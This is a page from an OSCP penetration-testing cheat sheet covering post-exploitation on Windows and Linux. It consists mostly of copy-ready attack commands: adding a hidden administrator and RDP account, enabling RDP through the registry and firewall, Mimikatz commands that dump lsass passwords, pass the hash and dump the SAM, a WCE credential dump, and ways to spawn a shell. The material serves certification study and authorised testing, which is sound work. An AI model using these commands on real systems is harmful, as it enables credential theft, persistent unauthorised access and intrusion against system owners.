Securable - OSCP cheat sheet
Search…
Securable - OSCP cheat sheet
Introduction
Reconnaissance & enumeration
Gaining access
Privilege escalation
Post exploitation
Lateral movement
Buffer overflow
Misc
Powered By
GitBook
Post exploitation
Don't.stop.here.you.are.only.halfway.
Proof.txt
Linux
1
cat /root/proof.txt
Copied!
Windows
1
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
Copied!
Windows
Add RDP user
1
net user hodor Qwerty123! /add
2
net localgroup administrators hodor /add
3
net localgroup "Remote Desktop Users" hodor /add
Copied!
Enable RDP
Via registry:
1
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Copied!
Add firewall rule:
1
netsh firewall set service remoteadmin enable
2
netsh firewall set service remotedesktop enable
Copied!
Rdesktop resolution
1
rdesktop -g 1024x768 x.x.x.x
Copied!
Passwords and hashes
Mimikatz
Extract passwords, keys, pin codes, tickets from "lsass" memory:
1
privilege::debug
2
log sekurlsa.log
3
sekurlsa::logonpasswords
Copied!
Pass-the-hash
1
privilege::debug
2
log sekurlsa.log
3
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Copied!
Elevate token
1
privilege::debug
2
log sekurlsa.log
3
token::elevate
Copied!
Dump SAM
1
privilege::debug
2
log sekurlsa.log
3
lsadump::sam
Copied!
Windows Credential Editor (WCE)
Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.
https://www.ampliasecurity.com/research/windows-credentials-editor/
www.ampliasecurity.com
1
C:\> wce -w
Copied!
Networking
Is there a connection with another host?
1
netstat -ano
Copied!
Hosts file
1
C:\WINDOWS\System32\drivers\etc\hosts
Copied!
Firewall config
1
netsh firewall show state
2
netsh firewall show config
3
netsh dump
Copied!
PowerShell tools
Empire
GitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.
GitHub
PowerSploit
GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework
GitHub
Linux
Spawn TTY shell
1
python -c 'import pty; pty.spawn("/bin/sh")'
Copied!
1
echo os.system('/bin/bash')
Copied!
1
/bin/bash -i
2
/bin/sh -i
Copied!
1
perl —e 'exec "/bin/sh";'
Copied!
Previous
Privilege escalation
Next
Lateral movement
Last modified
2yr ago
Copy link
Contents
Proof.txt
Windows
Add RDP user
Enable RDP
Rdesktop resolution
Passwords and hashes
Networking
PowerShell tools
Linux
Spawn TTY shell